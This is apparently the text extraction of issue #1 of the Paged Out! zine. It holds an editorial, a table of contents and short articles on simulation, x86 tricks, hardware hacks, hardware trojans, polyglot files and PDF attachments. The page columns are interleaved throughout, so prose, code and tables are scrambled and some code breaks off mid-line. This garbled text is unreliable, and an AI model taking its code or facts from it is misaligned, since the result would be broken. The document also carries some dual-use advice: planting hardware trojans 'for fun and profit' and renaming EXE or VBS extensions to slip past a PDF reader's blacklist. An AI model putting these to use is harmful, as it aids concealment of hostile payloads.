Paged Out! is what happens when a technical reviewer sees too many 20-page long programming articles in a short period of time. Though that's only part of the story. The idea of an experimental zine focusing on very short articles spawned in my mind around a year ago and was slowly — almost unconsciously Paged Out! Institute — developing in my head until early 2019, when I finally decided https://pagedout.institute/ that this whole thing might actually work (even given my chronic lack of time).
Project Lead Why short articles in the first place, you ask? They are faster to Gynvael Coldwind read, faster to write, faster to review, and it's fully acceptable to write a one-pager on this one cool trick you just used in a project / exploit. Furthermore, as is the case with various forms Executive Assistant of constraint programming and code golfing, I believe adding Arashi Coldwind some limitations might push one to conjure up interesting tricks while constructing the article (especially if the author has DTP Programmer almost full control of the article's layout) and also, hopefully, foxtrot_charlie increase the knowledge-to-space ratio. Giving authors freedom to arrange the layout as they please has DTP Advisor interesting consequences by itself. First of all, we can totally tusiak_charlie dodge a standard DTP process – after all, we get PDFs that already use the final layouts and can be merged into an issue with just a set of scripts (therefore our Institute has a DTP Lead Reviewers Programmer instead of a DTP Artist). Secondly, well, every Mateusz "j00ru" Jurczyk article looks distinctly different — this is the reason I say our KrzaQ project is "experimental" — because nobody can predict whether this artistic chaos of a magazine will get accepted by our technical community. And thirdly, merging PDFs is a pretty Reviewers interesting technical challenge by itself – and even though I fully kele believe in our DTP Programmer, I do realize it might take a few disconnect3d issues to get an optimal PDF.
As for the variety of topics in our zine – programming, hacking, gamedev, electronics, OS internals, demoscene, radio, and so on, We would also like to thank: and so forth – what can I say, I just wrote down the areas I personally find fascinating, enchanting and delightful. Artist (cover) To finish up, I would like to wish our readers an enjoyable ReFiend(deviantart.com/refiend) experience with the first issue of the free Paged Out! zine. And in case you have any feedback, please don't hesitate to email Additional Art [email protected]. cgartists (cgartists.eu) Have Fun, Good Luck! Templates Matt Miller Gynvael Coldwind wiechu Project Lead Mariusz "oshogbo" Zaborski
Legal Note Issue #1 Donators This zine is free! Feel free to share it around. Mohamed Saher (halsten) Licenses for most articles allow anyone to record audio versions and post them online — it might make a cool podcast or be useful for the visually impaired. If you would like to mass-print some copies to give away, the print files are If you like Paged Out!, available on our website (in A4 and US Letter formats, 300 DPI). let your friends know about it! If you would like to sell printed copies, please contact the Institute. When in legal doubt, check the given article's license or contact us. Accelerating simulations by clustering bodies using...... 6 Multi-bitness x86 code...... 7 AVR debug env for CTF and profit? Nah...... 8 chubby75...... 9 Hackulele...... 10 w00zek...... 11 Hacking Guitar Hero...... 12 Hardware Trojans Explained...... 13 A guide to ICO/PDF polyglot files...... 14 PNG Themed Python Code Golf ...... 15 Adding any external data to any PDF...... 17 The \TeX{}nicalities of Paper Folding...... 18 Windows Syscall Quiz...... 19 Let Your Server Anwser the Phone...... 20 A Python Pwnliner's Tale...... 21 Javascript - Global Variables...... 22 Bomb Out!...... 23 quinesnake - a quine that plays snake over it's own source!...... 24 Emulating virtual functions in Go...... 25 Intro to Embedded Resources in Windows Apps...... 26 Introduction to ptrace - injecting code into a running process...... 28 Strings & bytes in Python 3...... 29 CP850 cmd game in C# .NET...... 30 from cpython_exploit_ellipsis import *...... 31 A parser-generator in 100 lines of C++...... 32 Rome golfing...... 33 Does order of variable declarations matter?...... 34 Bootcard...... 35 Designing adder circuit for Fibonacci representation...... 36 A box of tools to spy on Java...... 37 TRF7970A forgotten features for HydraNFC...... 39 Build your own controller for NES!...... 40 Wobble the Nintendo logo on the Game Boy...... 41 HOW TO: unboringly tease GoogleCTF 2019...... 42 HOW TO: easily get started with radare2...... 43 Crackme Solving for the Lazies...... 44 Android Reverse Engineering...... 45 anti-RE for fun...... 46 Reverse Engineering File Format From Scratch...... 47 Back to the BASICs...... 48 AndroidProjectCreator...... 50 Reverse Shell With Auth For Linux64...... 51 On escalating your bug bounty findings...... 52 Fun with process descriptors...... 53 Windows EPROCESS Exploitation...... 54 MOV your Exploit Development Workflow to [r2land]...... 55 DNS Reflection done right...... 56 The Router Security Is Decadent and Depraved...... 57 PIDU - Process Injection and Dumping Utility...... 58 Exploiting FreeBSD-SA-19:02.fd...... 59 Semantic gap...... 60 Using Binary Ninja to find format string vulns in Binary Ninja...... 61 Injecting HTML: Beyond XSS...... 62 Building ROP with floats and OpenType...... 63 Scrambled: Rubik's Cube based steganography...... 64 Rsync - the new cp...... 65 What to pack for a deserted Linux Island?...... 66
4 Dearest neighbors, n 19th century America, there were books made specifically for the frontiersman who couldn’t carry a library. The idea was that ■ if you were setting out to homestead in the wild blue yonder, one properly assembled book could teach you everything you needed to know that wasn’t told in the family bible. How to make ink from the green husks around walnuts, how to grow food from wild seeds, and how to build a shelter from scruffy little trees when there’s not yet time to fell hardwood. You might even learn to make medicines, though I’d caution against any recipes involving nightshade or mercury. Now that the 21st century and its newfangled ways are upon us, the fine folks at No Starch Press have seen fit to print the collected works of The International Journal of Proof of Concept or Get the Fuck Out—our first fourteen releases—in two classy tomes, bound in the finest faux leather, on over fifteen hundred pages of thin paper, with ribbons to keep your place while studying. You will see practical examples of how to write exploits for ancient and modern architectures, how to patch emulators to prototype hardware back- doors that would be beyond a hobbyist’s budget, and how to break bad cryptography. You will learn more about file formats than you ever believed possible, and a little about how to photograph microchips and circuit boards for reverse engineering. This fine collection was carefully indexed and cross- referenced, with twenty-four full color pages of Ange Albertini’s file format illustrations to help understand Use discount code APAIROFPOC our polyglots. But above all else, beyond the nifty for 40% off of both volumes. tricks and silly songs, these books exist to remind you what a clever engineer can build from a box of parts with a bit of free time. Not to show you what others https://nostarch.com/gtfo have done, but to show you how they did it so that you can do the same. https://nostarch.com/gtfo2 Your neighbor, Pastor Manul Laphroaig Algorithmics Accelerating simulations by clustering bodies using... Accelerating simulations by clustering bodies using the Barnes-Hut algorithm Simulating forces such as gravity is a demanding task, because of the interactions every object has with all B the other objects. With n objects, there are n − 1 forces C · − A A H acting on each body, so all in all, there are n (n 1) D forces acting. The Barnes-Hut algorithm can be used to approximate the forces that need to be calculated by E D E F G clustering the objects, sacrificing accuracy. In order to take those clusters into effect, the algorithm takes the F G H B C size of the individual clusters and their distance to the respective object into account. (a) Cell representation (b) Tree representation Figure 2: Visual representations of the same Barnes-Hut tree. (http://arborjs.org/docs/barnes-hut) r s1 The tree in Figure 2b describes the cells from Figure 2a - top left, top right, bottom left and bottom right are depicted as a new layer in the tree accordingly. While d building the tree, we are going to store the center of grav- q1 r s1 ity and the total mass of each inner node. The complete process of simulating the force acting on a single star works in the following way: Figure 1: A cluster of stars that is far enough away from a single We walk through the tree starting from the root in d star can be abstracted as a single point in space. the direction of the leaves, using r <θ as the end condi- tion. We use θ as a threshold for controlling how many d forces to take into account (0 ≤ θ ≤ 1). The force acting θ = (1) r on a star is calculated when a leaf is reached or when an end-condition is met (thus resulting in no further recur- The above equation describes how to cluster the ob- sion into the tree from that node on). jects. If a body (s1) is far away from a small cluster Experimenting with the value of θ on the dataset (r ≫ d), θ gets very small and the cluster in which can optimize the runtime from O(n2) to as low as the body is located can be abstracted to a single point. O(n · log(n)). This means that if we’ve got 2 · 108 bodies 0 ≤ θ ≤ 1 is provided by the user as a threshold impact- and can calculate the forces acting on 106 bodies per sec- ing the accuracy and the speed of the simulation. Its ond, the total runtime is reduced from about 1200 Years value should be tuned in depending on the given data, down to 45 minutes optimally (the time to build the tree as it decides which stars are approximated as a single is an actual computational complexity (Θ(n · log(n))), cluster. not a measured runtime and does not depend on θ ). Everything is based on the stars being in a tree, so This principle can also be applied to other types of we need to subdivide the space into cells. Such a subdi- problems such as simulating molecules. If you come to vision can be seen in Figure 2a and the process can be do something with it, don’t mind writing to me! seen on the bottom of this page. When calculating the forces affecting the object F in Figure 2a, the Barnes-Hut algorithm does not consider @hanemile on most platforms. all objects indvidually, but only the ones that fall over the threshold θ. For the object F , this means that the Objects B and C are not calculated independently, but as a single object (a new abstract object is created in the center of gravity of B and C).
B B B C A A A B A A C A
We start with an empty space We insert the Star A Inserting B: Subdivide, shift A, Inserting C: Subdivide, shift A, shift B from root shift C from root
https://github.com/hanemile Emile https://twitter.com/hanemile 6 SAA-ALL 0.0.5 Multi-bitness x86 code Assembly
I first needed a trick of this kind nearly 20 years ago, when I was working on a variant of unreal mode that Multi-bitness x86 code allowed for 32-bit code segments. I wanted a common interrupt table that would not need rewriting back and forth, so my interrupt handlers had to detect if CS was Tomasz Grysztar a 32-bit segment and in that case switch back to regular tgrysztar@flatassembler.net real mode before calling the original vector (a 16-bit BIOS or DOS service). The snippet I used looked like: hex use16 use32 When an interrupt happens, the flags 3D 77 77 cmp ax,7777h cmp eax,0??EB7777h get stored on the stack, so it was not EB ?? jmp already16bit a big deal that CMP altered a few of I thought this was a fun solution, but then I found out them. that it was actually possible to move IDT base in real mode, what made this trick obsolete.
Not long after, I was learning of the then-upcoming believe that perhaps some of existing machine code could x86‑64 architecture (an official name at the time) and run correctly in 64-bit segment without any alterations. I noticed that 32‑bit instructions were mostly encoded Later I realized that many small obstacles made it not the same in the new mode. Only things like addresses really viable in general, though certainly possible for and stack elements were promoted to 64-bit auto ‐ some small snippets, like this one that converts slashes matically, other sizes stayed as they were unless a REX to backslashes in a UCS-2/UTF-16 string at ESI/RSI: prefix was used. It stirred my imagination and made me hex use32 use64 56 push esi push rsi convert: convert: 66 AD lods word [esi] lods word [rsi] 66 85 C0 test ax,ax test ax,ax 74 0E jz done jz done 66 83 F8 2F cmp ax,'/' cmp ax,'/' 75 F3 jne convert jne convert 66 C7 46 FE 5C 00 mov word [esi-2],'\' mov word [rsi-2],'\' EB EB jmp convert jmp convert done: done: 5E pop esi pop rsi
I never really needed a variant of my trick that would distinguish 64-bit mode from 32-bit one. But years later In 64-bit mode a CMP instruction is I learned that there are sightings of similar contrivances still 32-bit by default, so I could not in the wild, even if made for purposes much different simply reuse the old method. than mine. It made me think about upgrading my own snippet. I came up with this one: hex use64 use32 This one does not touch any flags, but 67 8D 06 lea eax,[esi] lea eax,[word 0??EBh] trashes EAX. It can be changed to use EB ?? jmp is64bit another register, but it always needs to sacrifice one. Modern processors also got a new opcode that enables a completely transparent variant: hex use64 use32 The operand of this instruction is 67 0F 1F 06 nop [esi] nop [word 0??EBh] decoded but nothing more is done EB ?? jmp is64bit with it. The address does not have to It might even be made into a three-way switch, for an be valid. unlikely occurrence that the code might get executed in 16-bit mode: Why would you ever need to tell hex use64 16‑bit mode from 64-bit one? I don't 67 0F 1F 06 nop [esi] know! EB ?? jmp short not32bit ; 32-bit mode detected... not32bit: As a bonus, here comes another three-way detector that 0F 1F 06 nop [rsi] simply does not care about preserving flags or registers. EB ?? jmp short is64bit What makes it interesting is perhaps that its intent is ; 16-bit mode detected... obscured when only looking at 64-bit disassembly. But is64bit: ; 64-bit mode detected... after reading this you might not get fooled anymore! hex use16 use32 use64 48 dec ax dec eax mov rax,0??EB??EB??EB??EBh B8 EB ?? mov ax,0??EBh mov eax,0??EB??EBh EB ?? jmp is16bit The extra copies of 0EBh that never EB ?? jmp is32bit jmp is32bit get executed serve no real purpose, EB ?? jmp unreachable jmp unreachable they just complete a nice pattern.
Tomasz Grysztar https://twitter.com/grysztar https://flatassembler.net SAA-ALL 0.0.5 7 Assembly AVR debug env for CTF and profit? Nah...
Modify line: AVR debug env for CTF ../$NAME_GDB/configure --prefix=$PREFIX –target=avr Add Python support: and profit? Nah… ../$NAME_GDB/configure --prefix=$PREFIX --with-python –target=avr I recently came across some CTF challenges based on Then run the script: it should automate most of the Arduino/ATmega bin/Intel HEX. I lost some time in things for you. At the end, if you installed the Dashboard setting up a debug environment, so I'd like to share here GDB interface, you’ll have your shiny debugger ready to my quick installation guide. be used in:
/usr/local/avr/bin/avr-gdb 1) I don't have a board… damn… OK, I'll go with software Remember to review the log file in case of errors: for If you don’t have a board with a JTAG or similar interface, example I missed a “missing package” for “texinfo” the the easiest way is to go with software: first time. https://github.com/buserror/simavr 3) but… but… GDB behaves in a strange way... Quick installation guide: So, quick cheat sheet for the avr-gdb. To connect to the (requires avr-gcc, avr-libc, freeglut3-dev) running simavr: # git clone https://github.com/buserror/simavr (gdb) target remote localhost:1234 # cd simavr # make Remember that the program is stopped, so if you want The only trick here is how to run it: to run it, just type “c” to continue.
#./examples/board_simduino/obj-x86_64-linux-gnu/simduino.elf -d To review the memory allocation:
https://github.com/cecio/ Cesare Pizzi 8 CC0 chubby75 Electronics
github.com/q3k/chubby75 chubby75 repository licensed under CC-0 Turn this boring old Ever needed a cheap FPGA board to just throw into a LED panel controller ! project somewhere? Are you bothered by the fact that the FPGA devboard most GPIO you usually get is a measly Arduino header? into an Look no further! Chubby75 is an effort to reverse engineer an LED panel controller board (identified RV901T, available on Aliexpress for around $20), that just happens to contain: - a Spartan 6 LX15 FPGA - 2x Gigabit Ethernet with PHYs As seen - 8MBytes of SDRAM on IRC! - over 70 5V GPIOs
We provide extensive documentation to turn this board into an FPGA development board for education and research. And, given enough effort, you might even be able to write a proper open source stack for controlling LED panels! We also provide support for Migen/MiSoC/LiteX, so you You might be wondering - how do you document a 4 layer can define your digital logic in Python. To blink an LED PCB and get a full pinout of all the connectors? run the following Python code in the Chubby75 git checkout: We started by finding JTAG on the board. Thankfully, it's marked on the silkscreen, so we just had to scrape the from migen import * soldermask off and solder to it. With that, we could start class Top(Module): running our own bitstreams on the board. But how do we def __init__(self, platform): even know where a clock or an LED is? # Single clock domain from external # oscillator. We ended up taking a brute force approach. One board osc = platform.request('clk25') was fully depopulated, sanded, and photos were taken of self.clock_domains.cd_sys = \ every layer. This allowed us to understand some things ClockDomain() about how the PHYs and SDRAM are connected, and how self.comb += self.cd_sys.clk.eq(osc) to control the I/O buffers on the board. We post processed # Blink that LED. the photos of the layers in GIMP and then layered them in led = platform.request('user_led') Inkscape, so that we could trace and label things as we counter = Signal(max=25000000) discovered them. self.sync += \ If(counter == 0, counter.eq(25000000), led.eq(~led), ).Else( counter.eq(counter-1)) )
# Instantiate and build for RV901T. from platform import Platform p = Platform() t = Top(p) p.build(t) # Program over JTAG with xc3sprog and a # Xilinx Platform Cable. import migen.build.xilinx.programmer \ as prgs prog = prgs.XC3SProg('xpc') prog.load_bitstream('build/top.bit') Once we had a general idea of how things worked, we wrote a little piece of Migen code to take all unknown pads of the Don't forget! Using LiteX allows you to quickly integrate FPGA and make them output their identifier as a repeated support for Ethernet (via LiteEth), and SDRAM (via ASCII string via UART. Using this, we could just probe the LiteDRAM). And, if you want a soft core, this FPGA will two large connectors on board with a USB to UART adapter easily fit a Lattice LM32 and a bunch of picorv32 RISC-V to immediately know what pin of the FPGA drove what pin cores! In the repository, you'll find a working example of of the connector. SDRAM + LM32 running C code. Right now you will still need Xilinx's ISE suite to develop Chubby75 is a collaboration brought to you by: for this board. However, there are efforts to bring an open Niklas Fauth, Jan Henrik, q3k, carrotIndustries, source toolchain to Spartan 6 FPGAs, so keep your eyes enjoydigital, jeanthom, informatic and many others. peeled!
q3k twitter.com/q3k CC BY 4.0 9 Electronics Hackulele
INSIDE THE FRETBOARD Hooking up your logic analyzer on SDA/SCL you get a HACKULE E listing of the I2C commands sent at boot time to the L IS31FL3731 chip (address 0X74). Because all things got to be smart, China gifted us with a Smart-Ukulele called Populele. No idea why the chip sends all these 0X08 74 08 commands, as they are nowhere in the The point is to use a bloated, kind of ugly app to connect 74 08 74 FD 0B IS31 doc, trying to fix weird timing issues to your uke over bluetooth, sending commands to blink 74 08 maybe? Or just sloppy coding? the lights behind the frets. The app gamifies the learning 74 0A 00 process, has songbooks and stuff, but as all “smart” things 74 08 I just ignored and wrote a CircuitPython 74 FD 00 lib to talk to the LED matrix ( ). go, everyone on the App’s page complains about unreli- 74 08 main.py able BT connection, bugs, etc. 74 00 FF The annoying part was finding what LED 74 08 address corresponded to where on the 74 02 FF fretboard. CLOSER LOOK AT THE SMART 74 08 74 04 FF To connect to the LED matrix, pull SCL & 74 08 The “smart” part is easy to pull off from inside the instru- SDA up with a 4.7K resistor, ment and reveals a boardy board, a lipo-y lipo, and cabley 74 06 FF 74 08 ground INT, and set SDB as a cables to connect to the blinky blink side. 74 08 FF ‘enable’ pin. The 5V VCC will 74 08 need more than 50mA, so 74 0A FF 74 08 don’t use an arduino GPIO. 74 0C FF 74 08 (…) 74 FD 00 FEMALE/UKE SIDE 74 08 ______74 08 _____| |____| |______74 90 55 | | 74 08 | 5V GND SCL | 74 08 | | 74 91 55 | SDB INT SDA | 74 08 |______| 74 08 74 92 55 74 08 You now get full control of the 74 08 74 93 55 LEDs PWM and super fast anima- tion update without the painful BLE setup.
ANIMATIONS! The library on the repo uses separate ‘Animator’ objects to update the internal LED state. It is heavily influenced Main chip there is a Dialog DA14580. Unfortunately, by the Best Badge Ever according to my logic analyzer, both TX/RX (for serial) (2018 DCFurs badge). & SDIO/SCK (for JTAG) aren’t active: no easy hacking for Both the CircuitPython main.py me :’( I couldn’t get any intel on the tiny thing on the side and BlueZ bluez.py scripts use that’s marked . 5F2 A71 TOG the same Animator objects. See animations/scroll.py BLE SNIFFING for an example. I use the NRF52 devKit by Nordic to sniff the BLE traffic. The output is verbose, the uke sends multiple heartbeats per second, for some reason, probably to drain the battery MORE INFO faster. Link to repo with more info, resources and docs: The Uke’s LED matrix state is set by a 19 bytes packet https://github.com/ sent to a GATT service (attribute handle 0X0024, UUID is Furikuda/hackulele 0000DC8600001000800000805F9B34FB). 3 bytes per string (G, C, E and A) are sent to set 18 LEDs (only the 18 You’ll learn about the infamous MSB are used) as so: “Page Night” (that comes after the th 8 page, and has the 0X0B identifier), AA AA AA EE EE EE CC CC CC GG GG GG F1 00 00 and some ideas for more research. 00 00 00 00 The bluez.py script will let you send these packets through BlueZ.
https://github.com/furikuda/hackulele Jokull Barkson 10 SAA-ALL 0.0.5 w00zek Electronics
w00zek [ˈvuzɛk], the motorized shopping cart
ingredients: - one shopping cart (gynvael wanted me to mention that you can buy one legally on ebay) - one hoverboard steps: 1) disassemble hoverboard 2) cut out hub motor brackets from chassis with bandsaw 3) (optionally) square down the brackets on a mill 4) remove front wheels from cart 5) cut down a 50mm flat bar to length and attach it to the front wheel mounts (likely with M12 bolts) 6) drill 8mm holes in bar and attach hoverboard motor brackets 7) mount a metal box on the bottom of the cart basket with zip-ties or another low-tech solution 8) mount controller and battery in box 9) fasten hub motors to brackets, run cables to control box (use 3- way electrical wiring for BLDC phases, CAT5 for hall sensors) 10) flash the controller board with github.com/niklasfauth/hoverboard-firmware-hack 11) attach controller to a thinkpad via UART and write python code that sends control packets 12) wear a helmet 13) try not to kill yourself
see https://wiki.hackerspace.pl/projects:w00zek for more info, test drive footage and some control firmware code
q3k twitter.com/q3k CC BY 4.0 11 Electronics Hacking Guitar Hero
By S01den ([email protected] | https://github.com/S01den) Article licensed under CC-0 ------Like a lot of people, you probably have or had a Wii; and like most people you like Guitar Hero, so you may have somewhere in your house an old Guitar Hero game and the guitar-shaped controller collecting dust. If you have one, this article is made for you! In this article, I'll explain how I hacked an old Guitar Hero controller in order to transform it into a minimalist musical instrument. For that, we just need a Guitar Hero controller (thanks captain obvious), an Arduino Uno, some wires, a potentiometer, an el ectrodynamic loudspeaker, a resistor of 250 ohms and an NPN transistor (I used a 58050 D-331 for this project). Before the fun part, there is a little bit of theory. Normally, our guitar is connected to a W iimote (the principal Wii controller). Almost all Wiimote's accessories are controlled thanks to an I2C bus. An Inter-Integrated Circuit (I2C) bus allows to transmit data between two components thanks to only 2 wires: the SDA wire for the data signal (to transport data) and the SCL wire for the clock signal (to synchronize). Sooooo basically, we just have to get the states of the controller's buttons and play different notes depending on the button pressed. With an Arduino (as a master), we can easily communicate through an I2C bus with the controller (which acts as a slave, at the 7-bit address 0x52), for example this is a piece of code which begins the communication: ------Wire.begin(); | For this project, I wrote my own library to communicate Wire.beginTransmission(0x52); | with the guitar. Wire.write(0x40); | All the sources of this project are available here: Wire.write(0x00); | https://github.com/S01den/Real_Life_GuitarHero Wire.endTransmission(); | Play with it as you wish it. ------To know the function of each wire on the controller's connector, I had to desolder it and I found this correspondence: ------[ WIRE | FUNCTION | PIN TO CONNECT ON ARDUINO ] ------[ BROWN | SDA | A4 ] [ RED | GROUND | GND ] [ WHITE(1) | SCL | A5 ] [ WHITE(2) | POWER | 3V3 ] ------(1): near the red wire (2): near the blue wire The guitar is now connected to the arduino! To finish, you just need to add a potentiometer to control the sound power, and electrodynamic speaker to emit music notes. The music notes are generated by the tone function, called like that tone(8, note_x[k], 250); where 8 is the pin where the speaker is connected, note_x[k] is the note played (x is an A, B, D, E or G the notes emitted by the guitar strings) with the octave k (modifiable by pressing the + and – buttons) and 250 is the duration (250 ms). Just follow the scheme below (made with fritzing) and you should obtain something like that:
[email protected] S01den https://github.com/S01den 12 CC0 Hardware Trojans Explained Electronics
Such HW trojans are called combinationally Hardware triggered. But there are also other options available! The attacker can control when an attack will take Trojans place. This can be done by using a system clock or by counting incidents of selected operations. EXPLAINED! In four simple examples!
Hardware trojans are hidden from user features of a hardware component which can add, remove or modify the functionality of electronic element, Such trojans, which are activated by a sequence of thereby reducing its reliability or creating a operations (in time) or after a period of time are potential threat. HW trojan consists of two building called sequentially triggered. Finally, nobody blocks: trigger and payload. Payload is a malicious prevents you from using both methods at once i.e. modification of the circuit that changes the signal hybrid approach: values. Trigger decides when to activate the payload.
So take a look at the figure on the left - the simplest circuit ever – traditional NOT gate (aka. inverter) that just negates the value of the input signal. In such configuration, the attacker can only have Real Story: Even simple modifications, as already one goal - to change the value of the ‘s’ signal. discussed, can be used to attack crypto engines. However, he has a wide range of tools and methods Below a schematic representation of the attack: at his disposal. So let’s start with the simplest Encrypted approach: Plain Data In Data Out Crypto Unit
Original Compromised HW key (e.g. known bits) key Trojan
According to declassified documents from 2015, In this scenario, the value of the AND gate Crypto AG (Swiss manufacturer of cryptographic (payload) changes the value of the ‘s’ signal hardware), in cooperation with NSA, has depending on the values of the ‘p’ & ‘q’ introduced compromised HW to some of its signals (trigger) that can be generated at any customers. The complete list is still classified, but moment of the circuit work. Who decides about the it is known that HW was used to spy on Iran and ‘p’ & ‘q’ values? These signals can be derived from Libya, for example. Modifications were made in other system components (e.g. sensors) or some the form of hardware trojans / backdoors, which external events (e.g. network monitor). In fact, you weaken the cryptographic protection at the may even use the same signals that generate the request of the authority (as shown in the above original ‘s’ input. Just take a look at the next figure: figure). For many years, history was discredited as a conspiracy theory. More : https://en.wikipedia.org/wiki/Crypto_AG
As you see it is not that difficult! Indeed, you may create some of these circuits “at home” (even using discrete elements) and later apply them to existing products - of course for fun and profit! ;)
Adam Kostrzewa https://adamkostrzewa.github.io/ https://twitter.com/systemWbudowany SAA-ALL 0.0.5 13 File Formats A guide to ICO/PDF polyglot files
As long as the source file contains less than 64 images A guide to ICO/PDF we are at this point still comfortably within the first 1024 bytes of the output file and can simply append the polyglot files bulk of our PDF file up to and including its last stream object. In this article we are going to demonstrate how to create a polyglot file that is a valid ICO image as well outfile.write(pdf.read(OFFSETLASTSTREAM) as a valid PDF document. After this we extract the image data from our input These two file formats have a couple of interesting ICO and append them as additional stream objects with properties that make this endeavour possible. suitable, unique object ids. ICO is a container format for files that can contain one or more BMP or PNG images. An ICO file is defined OBJSTREAM HEAD = ”””{} 0 obj << by a 6 byte header that contains some magic bytes and /Length {} the number of images in the file. This is followed by a >> 16 byte header each for every one of the images which stream among other data contains the offset and size of the ””” actual image data. OBJSTREAM TAIL = ”””endstream endobj While it is common practice to have the image data ””” start immediately after the headers this is not strictly for i in ico data: required. Any data that is not located inside one of the outfile.write(OBJSTREAM HEAD.format( image data areas specified in the header is ignored. obj id, i[0]).encode(’utf−8’)) The PDF file format is specified in ISO 32000. This icofile.seek(i[1], 0) specifications requires PDF files to start with the magic ico offsets.append(outfile.tell()) byte sequence %PDF. This requirements collides with outfile.write(icofile.read(i[0])) the ICO header. Fortunately practically all PDF libraries outfile.write( and applications implement the Adobe supplement to the OBJSTREAM TAIL.encode(’utf−8’) ISO 32000 which only requires the magic bytes to be ) present in the first 1024 bytes of a document. This obj id += 1 gives us enough room to fit a ICO header with up to 63 At the end of the output file we can then simply append sub-images before the PDF data. the rest of our source PDF. Additionally there are several ways to include non- visible binary data in a PDF file. This is where we are pdffile.seek(OFFSETLASTSTREAM, 0) going to put our image data. In this particular example outfile.write(pdffile.read()) the data will be placed into stream objects which have The last thing that remains to do now is to fix the the following format: offsets of the image chunks in the ICO header. Since we OBJECT ID 0 obj saved the offsets when appending them to our output << file this is easily accomplished. /Length LENGTH OF DATA >> ico offsets.append(outfile.tell()) stream outfile.seek(18, 0) IMG DATA for i in ico offsets: < endstream outfile.write(struct.pack(’ I’, i)) endobj outfile.seek(12, 1)
Where OBJECT ID is an unique numerical id, Now we are in possession of a ICO-PDF polyglot file LENGTH OF DATA is the number of bytes of data that we can put to good use by e.g.: in the stream and IMG DATA will be our image data. • embedding a CV/job posting into the favicon of our Armed with this knowledge about the file formats and website to challenge recruiters/job seekers an idea how to interleave them we can start to create a file that is a valid ICO as well as a valid PDF from two • putting a manual for its easter eggs into the desktop existing files. icon of our application First we need to determine the number of images in A Python implementation of the process described the ICO file from bytes 5 and 6 of its header so we can above including example data and ready made polyglot copy all the headers to our output file. files can be fount at https://github.com/tickelton/ico- img count = struct.unpack( pdf. ’ https://twitter.com/tickelton tick https://tickelton.gitlab.io/ 14 SAA-ALL 0.0.5 PNG Themed Python Code Golf File Formats PNG Themed Python Code Golf 0x00 INTRODUCTION 0x02 THE SCRIPT Back in May 2019, Gynvael Coldwind organized a code So far, we’ve op- Method Bytes 0x00 timized the PNG golf competition where you could win a ticket for bz2.compress 950 0x01 CONFidence , an international IT security conference. file as hard as we lzma.compress 768 Actually, there were 3 competitions for 3 technologies: could. Now, what gzip.compress 732 C++, JavaScript and Python 3, but I’ll focus on the last about squeezing zlib.compress 722 one. The goal was to write a program that generates it up even further zlib.compress(level=9) 720 a valid PNG file named confidence.png with pixel val- by applying gen- zopfli--deflate 710 ues exactly matching a specified model image. Entries eral purpose com- were run on an offline, fresh install of Ubuntu Server pression? We could use Python’s methods, but zopfli 19.04 using python3confidence.py command. Also wins again with raw deflate stream. To decompress it in there was a 60 seconds execution time limit. Darn! No Python we need to use zlib.decompress with wbits=-8 brute-forcing. The smallest confidence.py file wins! as additional argument. Now, what about putting these Accidentally, I’ve managed to win0x02 with a 1133 bytes 710 bytes of binary data into a Python script? We would need a whole 2009 solution but let’s do better! Shall we? Method len()len(repr()) bytes to represent 0x01 b64encode 948 951 THE IMAGE it as a bytes literal. a85encode 888 915 0x03 First thought – the The model image was a 11746 bytes sized file: b85encode 888 891 Base64! But wait! The base64 module also supports Base85 encoding. With larger character set it is more efficient. It is a code golf after all, every byte counts! Putting this all together gives… import zlib,base64 as b;open('confidence.png','wb'). write(zlib.decompress(b.b85decode('>kRO7=jD>(Vqjq4_4 IHFVqjozU|?XeU||M|Nd3K20Hh=Wd_r7-bSx7~4>Q~U|Nj@Wupez~y4cvfuA$LVZp&W=2 2OcT7srqa#y58yCq8lzX?Pee!gk9^=LnP7F(Bd=3*#0`QWX2fGJVOexNm|C-+uQsdM-Eq 8eUw*$Uq_Z5J94bE&77_?*v#6TxaFskPt8cVTA;T10dYc;0VNwjLb}IAj|?(z;Y+Z$CXJ Ps06MItfU!;!AhXYKxPrI2yPi+MYru0<}n~Ef+)ad5@AIU1*9q>97^OWLO2?TQM^x*qFY @rq{6=JpT770r(3%|-B&9!xp(w##q_&@FaMTuO8odhRJa^hh`MuTqsfu8SN4is^%q`tW6 cMh%b)hHk$U`0s`hm0^Eb=yX6xGB{PR$qxZp}q3+rCn7BOr0e81CIy_Ov+S@ZAnRMoKEW $SzSD_2#1{$EqZ#7tD`NlU8T88&avlo@@YGsLcPUEef$*|R5ee_LnGPM@;%-BwKt7NX)V p4WJz&t9)M>7>k6{>N8&`|W*|*=iY5oO<_c`MkNr#TK*v6*FnMHMR#o6#cgSyz;@?vbYB blamedrop - Public Domain 15 File Formats Adding any external data to any PDF Absolute offsets Adding any external data To be perfectly compatible (for example with 7z or Windows Explorer), a ZIP needs its offsets to to any PDF be re-adjusted so that they are absolute to the Attaching file, not relative to the start of the archive. This can be fixed in place with the Info-ZIP zip -F command. But then when you extract the ZIP as a PDF attachment, its offsets will be incorrect again, as only the attachment will be copied out of the file. To attach a file to a PDF, you can rely on free tools out there: Embedding by hand pdftk doc.pdf attach_files myfile.bin So you may want to drop the attachment output attached.pdf functionality altogether, and just embed the file Note that Adobe Reader forbids to download as a single data stream instead: EXE, VBS or ZIP files, so you might want to # create a dummy object entry rename their extensions. objNb = doc._getNewXref() When attaching such files, the entire PDF is doc._updateObject(objNb, '<<>>') recreated, so you can't revert to the original doc. # add contents of the archive doc._updateStream(objNb, Zipdata, new=True) Incremental updates A more elegant way to attach a file is to do it via Appended data an incremental update, so that you make it clear Some tools will still complain that there is that the file was attached afterwards: the content appended data after the archive when you read of the original file body is unmodified, only the it from the polyglot. A workaround is to extend updating elements will be appended: an XREF the archive comment to the end of the file once update, a new catalog that references the it's in the polyglot: attachment, the attachment declaration and its # locating the comment length in the ZIP's EoCD data stream. # 4:Sig 2:NbDisk 2: NbCD 2:TotalDisk 2:TotalCD # 4:CDSize 4:Offset 2:ComLen import fitz # from PyMuPDF offset = filedata.rfind("PK\5\6") + 20 ... # new comment length doc = fitz.open(pdf) length = len(filedata) - offset - 2 # create an attachment with open (pdf, "wb") as f: # modify the extension to bypass blacklisting f.write(filedata[:offset]) doc.embeddedFileAdd(name, f.write(struct.pack(" the original file body intact, and will give back a perfectly valid PDF file. Conclusion That said, if you attach a ZIP to a PDF, you Attaching a file via an incremental update is an could think of making it a ZIP/PDF polyglot. elegant way to extend a document while preserving its original structure. Incompatibilities with polyglots But a ZIP file can't be at the same time attached But these are mutually exclusive: even if you to a PDF doc and referenced externally as a store the incremental update with no ZIP/PDF polyglot. compression via: doc.save(doc.name, Ange Albertini with the help of incremental=True, expand=255), Nicolas 